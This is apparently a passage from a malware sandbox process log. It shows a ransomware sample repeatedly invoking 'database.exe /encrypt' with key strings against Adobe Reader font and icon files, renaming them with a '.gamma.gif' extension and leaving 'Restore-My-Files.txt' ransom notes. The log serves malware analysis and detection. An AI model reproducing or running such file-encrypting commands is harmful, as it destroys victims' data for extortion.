C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1652
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:3972
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:208
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:944
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6788
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2280
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:5104
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:5516
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:1896
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5316
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1872
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4560
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1660
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\Restore-My-Files.txt"5⤵PID:1408
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5996
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:920
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2572
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\Restore-My-Files.txt"5⤵PID:3240
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:984
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4304
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2284
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\APIFile_8.ico.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5564
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" 